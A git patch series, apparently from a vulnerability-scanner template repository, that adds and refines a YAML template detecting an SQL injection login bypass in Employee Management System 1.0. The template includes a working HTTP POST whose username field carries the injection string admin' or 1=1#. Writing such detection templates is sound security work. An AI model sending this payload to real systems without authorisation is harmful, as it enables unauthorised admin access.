From 2fd7baf1bfc756c69ea3c3a3cd4e08f04460de43 Mon Sep 17 00:00:00 2001
From: Arafat Ansari <54571841+arafatansari@users.noreply.github.com>
Date: Thu, 21 Jul 2022 12:39:06 +0530
Subject: [PATCH 1/3] Create ems-sqli.yaml

---
 vulnerabilities/other/ems-sqli.yaml | 35 +++++++++++++++++++++++++++++
 1 file changed, 35 insertions(+)
 create mode 100644 vulnerabilities/other/ems-sqli.yaml

diff --git a/vulnerabilities/other/ems-sqli.yaml b/vulnerabilities/other/ems-sqli.yaml
new file mode 100644
index 0000000000..edbcbe17d5
--- /dev/null
+++ b/vulnerabilities/other/ems-sqli.yaml
@@ -0,0 +1,35 @@
+id: ems-sqli
+
+info:
+  name: Employee Management System 1.0 - SQLi Authentication Bypass
+  author: arafatansari
+  severity: high
+  description: |
+    Employee Management System Login page can be bypassed with a simple SQLi to the username parameter.
+  reference:
+    - https://www.exploit-db.com/exploits/48882
+  tags: sqli,bypass,cms
+
+requests:
+  - raw:
+      - |
+        POST /process/aprocess.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        mailuid=user%27+or+1%3D1%23&pwd=nuclei&login-submit=Login
+
+    redirects: true
+    max-redirects: 2
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'window.start_load'
+          - 'Admin Panel'
+          - 'Employee Management System'
+
+      - type: status
+        status:
+          - 200

From b78a6b9a85afb7948139592e99e69ab36055db98 Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Sat, 30 Jul 2022 12:16:47 +0530
Subject: [PATCH 2/3] Update ems-sqli.yaml

---
 vulnerabilities/other/ems-sqli.yaml | 10 +++++++---
 1 file changed, 7 insertions(+), 3 deletions(-)

diff --git a/vulnerabilities/other/ems-sqli.yaml b/vulnerabilities/other/ems-sqli.yaml
index edbcbe17d5..21b31e8ca3 100644
--- a/vulnerabilities/other/ems-sqli.yaml
+++ b/vulnerabilities/other/ems-sqli.yaml
@@ -8,7 +8,10 @@ info:
     Employee Management System Login page can be bypassed with a simple SQLi to the username parameter.
   reference:
     - https://www.exploit-db.com/exploits/48882
-  tags: sqli,bypass,cms
+    - https://www.sourcecodester.com/sites/default/files/download/razormist/employee-management-system.zip
+  metadata:
+    verified: true
+  tags: ems,sqli,cms,auth-bypass
 
 requests:
   - raw:
@@ -17,7 +20,7 @@ requests:
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded
 
-        mailuid=user%27+or+1%3D1%23&pwd=nuclei&login-submit=Login
+        mailuid=admin' or 1=1#&pwd=nuclei&login-submit=Login
 
     redirects: true
     max-redirects: 2
@@ -26,9 +29,10 @@ requests:
       - type: word
         part: body
         words:
-          - 'window.start_load'
           - 'Admin Panel'
+          - 'Log Out'
           - 'Employee Management System'
+        condition: and
 
       - type: status
         status: